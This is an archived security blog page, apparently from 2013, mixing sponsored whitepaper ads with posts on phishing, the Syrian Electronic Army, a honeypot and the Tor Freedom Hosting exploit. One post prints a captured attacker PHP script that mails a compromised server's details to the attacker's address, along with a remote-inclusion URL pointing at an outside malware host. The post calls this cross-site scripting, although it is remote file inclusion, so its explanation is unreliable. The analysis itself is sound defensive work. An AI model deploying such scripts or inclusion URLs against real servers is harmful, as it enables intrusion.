This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

How to Avoid the Coming Backup Crunch

The following is external content provided as a free resource for blog readers.





Dell's critically acclaimed AppAssure enables IT to capture continuous backup snapshots, automate recoverability testing and offload data deduplication/compression.



As a result, businesses can successfully fulfill rapidly escalating data protection requirements using minimal infrastructure and human resources — allowing them to redirect resources to genuinely strategic technology initiatives.



Request Free!

Dell AppAssure 5: Free Trial Download

The following is external content provided as a free resource for blog readers.





Register now to check out this free trial now.



Request Free!

Anon Steganography Cracked, Further Mysteries Lie Within

Flashback to January of this year when I posted that Anonymous has most likely been infiltrated by multiple organizations (including law enforcement and terror organizations) and may be unwillingly distributing terrorist messages.

I have finally successfully cracked open one of the Anonymous related images suspected of containing Steganography...and I'm quite intrigued by its contents. As far as I know, this is only the second Steganographic image found in the wild which has been successfully cracked. The first image was posted online by NBC back in 2001 as part of a news story, and had a very simple password of "abc".

#ALERT: As Tensions Escalate with Syria, Beware Phishing Attacks

As tensions escalate with Syria, it is highly probable that phishing attacks will begin accompanying real news articles.

A common tactic used by malware writers and phishing senders is to exploit recent news to get you to download their malicious files.  This could be through a well crafted email with an embedded link, or infected attachment, claiming to be a real news article.

The most important step you can take is to be vigilant, and don't click on links within emails, even if they appear to original from friends. A common tactic now used by scammers and phishers is to compromise someone's email account, then use that email account to send messages to the person's contacts.

Also, don't expect this to just be through email.  Many spammers and phishers are now using social media, including Facebook and Twitter messages.

Know the signs of targeted spear phishing. If you work for the government, or are employed by a government contractor, you will be a prime target.  Spearphishing directed towards you may appear very credible, and may even be sent to your work email address.

Stay Vigilant.

Why the Syrian Electronic Army Didn't Hack the NY Times

I'm just going to come out and say it. The Syrian Electronic Army (SEA) is a fraud. They didn't "hack" the New York Times, or any other high visibility websites today.

All SEA did today was an extremely old trick of domain hijacking.  For those not familiar with it, here's a great writeup on how domain hijacking works.

Now it's possible that SEA performed the domain hijacking through compromise of MelbourneIT, this in itself is also unlikely, based upon previous successful "attacks" using low-tech spearphishing (targeted social engineering) to obtain credentials of target organizations.

Previously, Syrian Electronic Army gained control of the Associated Press' Twitter account, The Onion's Twitter account, and the advertising service "Outbrain", all through spearphishing attacks.

Sensationalize their "hacking abilities" all you want. The Syrian Electronic Army has so far displayed very little technical skill, instead attacking "soft targets" and using social engineering. While these attacks have so far been effective, they only point out the lack of security awareness training in today's workforce, and not any serious software flaws.

Any organization which has been directly hit by SEA (and that excludes the victims of domain hijacking) should seriously reexamine their employee security awareness training, and possibly consider bringing in an outside consulting company to help identify deficiencies.

The weakest link in any network will always be uneducated users.

Blade Server Strategies: Optimizing the Data Center

The following is external content provided as a free resource for blog readers.





Blade servers bring efficiency and agility to IT infrastructures by making it easy to add and move resources and applications. In a recent study, IDC found that companies using blade servers were able to cut operating expenses by 64 percent.



But to extract the optimal benefits from blade servers, IT shops must chose a vendor whose strategy and tools reduce complexity, simplify management, support lifecycle automation and deliver the flexibility to work in any environment.



Request Free!

My Free Magazines! New Website!


I started a new website today called "My Free Magazines!"

It's a free resource for just about every industry, offering free magazines, whitepapers, and technical resources.

Go check it out at http://www.MyFreeMagazines.tk

A Look at Fax Phishing

I recently setup a new honeypot which appears to be an IT security related company.

In addition to a few other hidden gems, this honeypot is complete with fake contact information for the company, including email, phone, and fax.

Today I received my first hit from the honeypot - and I was very surprised when it was a phishing attempt over fax!

The Phishing Attempt sent over Fax
This fax claims to be from the company's HR department, and is addressed to all employees, and advertises a 6 day all inclusive vacation at an exotic out-of-the-country location for only $129 per person.

The old adage holds true here - if something sounds too good to be true, it probably is.

A quick search shows that the number is very commonly used in scams, as seen here and here.

Of course the dead giveaway that this is a scam is that my honeypot doesn't have an HR department, and no one actually exists in the company to send such an offer out to the honeypot's nonexistent employees.

I have a feeling this new honeypot will provide for some great entertainment. Stay tuned for more!

Implementing Enterprise BYOD with Mobile Certificates

The following is external content provided as a free resource for blog readers.






While the majority of companies now support BYOD, few have been able to effectively manage the phenomenon. Implementing a mobile certificate offers a level of stability, security, and authentication that passwords can't provide.






Request Free!

How Virtualization is Key to Managing Risk for the SMB Market

The following is external content provided as a free resource for blog readers.





Virtualization can save your infrastructure before an outage occurs and can also ensure an efficient recovery without data loss. Read this eBook to learn how VMware® virtualization solutions can help prepare your systems for a disaster and protect your data if one does strike.



Request Free!

A Look At A Simple PHP Cross Site Scripting Attack

Someone was recently kind enough to attack my honeypot with an extremely simple PHP cross site scripting attack, suitable for teaching others.

How does a PHP cross site scripting attack work? Some PHP scripts allow loading of external scripts through special HTTP parameters. For example, am attacker could invoke a PHP cross site scripting attack against a vulnerable file using a URL such as:
http://myhoneypot.net/scripts/php/vulnerablescript.php?src=http://malwaresite.info/malware.php
The above attack would result in vulnerablescript.php executing malware.php.

One of the simplest attacks I've seen is detailed in the following lines:

<?php
$language = 'eng';
$auth     = 0;
$name     = ''; // md5 Login
$pass     = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode ='setoran @'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'komixobh@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
?> 
In this attack, the server sends an email message to komixobh@gmail.com providing the server name and URL exploited. This effectively tells the attacker where their scanning script succeeded, so that they can attack with more advanced scripts.

Quite genius really, don't let the server admin see your full capabilities in case it's a honeypot. Unfortunately for our attacker, this script reveals his email address (komixobh@gmail.com) which is being posted publicly on my blog. My blog is frequented by spam crawlers on a regular basis, so hopefully komixobh enjoys speaking with Nigerian Princes and receiving offers for male "enhancement" drugs.

The exploit really is that simple though, write a PHP script, upload it somewhere, and exploit vulnerable scripts with cross site scripting.

This is why it's important to always maintain current security patches, and follow vendor and industry best practices for securing your web applications.

You can see more example PHP scripts at my Malware Analysis Google Code page.

HP StoreOnce: Boldly Go Where No Deduplication Has Gone Before

The following is external content provided as a free resource for blog readers.





This paper will describe the challenges of data protection, why deduplication is critical to meeting the challenges, how HP is achieving its vision of federated dedupe with StoreOnce – and what HP’s StoreOnce VSA announcement and achievement means to backup services providers, enterprises with remote or branch offices and small and medium businesses as well.



Sponsored by HP and Intel® Xeon® processors.



Intel, the Intel logo, Xeon, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and/or other countries.



Request Free!

Symantec Intelligence Report: June 2013

The following is external content provided as a free resource for blog readers.





In this month's report we take a look at what has happened in a number of key sections of the threat landscape. We delve deeper into the trends surrounding vulnerabilities, including zero-day, browser, and plug-in vulnerabilities. We also take a look at phishing trends over the last few months, as well as what has been happening in both the spam and malicious code areas of the threat landscape. Finally we include the latest high-level stats surrounding data breaches in June. We've also provided a run-down on the biggest security stories for the month of June, recapping what happened and what that means to our readers.



Request Free!

The Evolution and Value of Purpose-Built Backup Appliances

The following is external content provided as a free resource for blog readers.





Customer strategies for data protection and recovery continue to be dictated by aggressive SLAs, rapid recovery, and ease of integration in existing environments. As a result, firms are embracing more disk-based data protection technologies, including Purpose-Built Backup Appliances (PBBAs) to protect and recover data and applications. These appliances include features such as data deduplication, compression, encryption, and replication. Meanwhile, unabated data growth continues to pressure IT staff and protection and recovery processes, leading customers to consider alternative backup methods and targets.



This IDC White Paper explores the increased use and adoption patterns of PBBAs, both integrated and targeted, and the utility these appliances provide to customers in their data protection processes. In addition, this White Paper illuminates the customer value that Symantec's Backup Exec and NetBackup appliances bring to the data protection and recovery process.



Request Free!



304% Return on Investment with SilverSky Network Security Solutions

The following is external content provided as a free resource for blog readers.





Download this study to learn how to evaluate the potential financial impact of SilverSky security services for your organization.



Request Free!





More Information...

SilverSky Email Encryption Demo

The following is external content provided as a free resource for blog readers.





SilverSky owns and operates the infrastructure, so no software is required at the organization level, minimizing cost and staff upkeep. The solution offers a variety of customizable tracking and reporting capabilities through a web portal and all messages can be stored for compliance purposes with SilverSky Email Archive.



Request Free!





More Information...

Email Data Loss Prevention (DLP)

The following is external content provided as a free resource for blog readers.





Watch this video to see firsthand how SilverSky's policy-driven Email Data Loss Prevention solution provides unmatched security and privacy at a fraction of the cost and complexity of old fashioned appliance and end-point approaches.



Request Free!





More Information...

Buyer's Guide: Selecting an SSL Management System

The following is external content provided as a free resource for blog readers.






An effective SSL Management System provides for the rapid deployment of Enterprise Security, Trust and Regulatory Compliance. SSL Management enables you to confidently address security challenges, significantly reducing your business risks and operating costs. Read more about best practices for selecting an SSL Management System.






Request Free!





More Information...

What the FBI probably knows about Tor Users

Vlad Tsyrklevich has posted an excellent analysis of the payload delivered by the Tor Browser Bundle exploit.

This payload was delivered to every Tor Browser Bundle user who visited a Freedom Hosting hosted Tor Hidden Service, including Tormail.

According to Vlad, the exploit sends the hostname and MAC address of the local system to 65.222.202.54 over HTTP, then crashes.

So, what can the FBI do with this information?

Well, they now have a record of what systems were visiting all sites on Freedom Hosting.
It is also safe to assume that the FBI now has all emails and logs stored by Tormail.

The Tormail emails can be an excellent datamine without any additional info. Many Tormail users could have possibly revealed sensitive information over Tormail, including their name and home address, especially if using Tor to order illicit goods or services.

However, the hostname and MAC address can also be useful.
For example, the FBI can use the MAC address to subpoena a computer manufacturer to find out who purchased the computer. They can then use the hostname to verify they have the right person.

For example, let's say the FBI got a hostname of "DOE-PC" and a MAC address matching a Dell laptop.

The FBI contacts Dell with a subpoena "Did you sell a computer to someone named Doe with MAC address XX:XX:XX:XX", Dell can send them the transaction information, including home address.

This is a big win for law enforcement worldwide, and should help to end some of the illegal activities occurring on Tor.


Just remember kiddies, there is no such thing as "private" on the Internet. Not even on Tor.


NOTE: You can review the deobfuscated JavaScript at my Malware Analysis Google Code site: https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/

Massive TOR Hidden Service Compromise

It was announced today on Twitter that one of the major "hidden services" hosting companies, has been delivering malicious content and the hosted sites shutdown after a raid by law enforcement.

Supposed, among the compromised services include "TorMail", which provides anonymized email services.

If TorMail has been compromised, this could have broader reaching effects, including giving the FBI and Interpol the ability to directly access associated accounts outside of Tor hidden services. It would then be easy for the authorities to request from associated websites a log of associated IP addresses.

This spells bad news for anyone who uses Tor for illegal purposes, and a major win for the law enforcement community.

NOTE: You can view deobfuscated versions of the malicious code at my Malware Analysis Google Code site: https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/

New Shodan Search: Trilithic

A New Shodan Search is now saved on SHODAN - Recently Saved Searches



Title: Trilithic

Description:

Trilithic creates cable and satellite equipment for diagnostics and maintenance, including Emergency Alert System equipment.

URL:

http://www.shodanhq.com/?q=Trilithic

Blog Updated to Include Shodan Searches and Free Security Resources

I've setup a couple experimental IFTT recipies to automatically post new Shodan searches to my blog, as well as post new Cyber Security resources as they become available.

If you notice it malfunctioning, please let me know via Twitter. This is a brand new feature, and I hope it works well.

@th3j35t3r Domain Seized by DHS, Arrested at Blackhat?

UPDATE: It appears that jesterscourt.cc is restored. This appears to all have been a hoax on the Jester's part.


It has been brought to light that The Jester's domain, jesterscourt.cc, has been seized by the Department of Homeland Security (DHS).

At the same time, Jester has gone dark on Twitter, with no new posts since July 31. Jester had already made multiple posts showing that he was attending the Blackhat conference in Las Vegas.

Does this mean Jester has been arrested at the Blackhat conference? This would explain the sudden siezure of his domain, and why his Twitter feed has gone dark.

This wouldn't be the first time a hacker was arrested at a Las Vegas conference. In 2001 a Russian hacker was arrested at DEFCON.


It's important to note that Jester has before faked his own "retirement" in the Smedley Manning incident.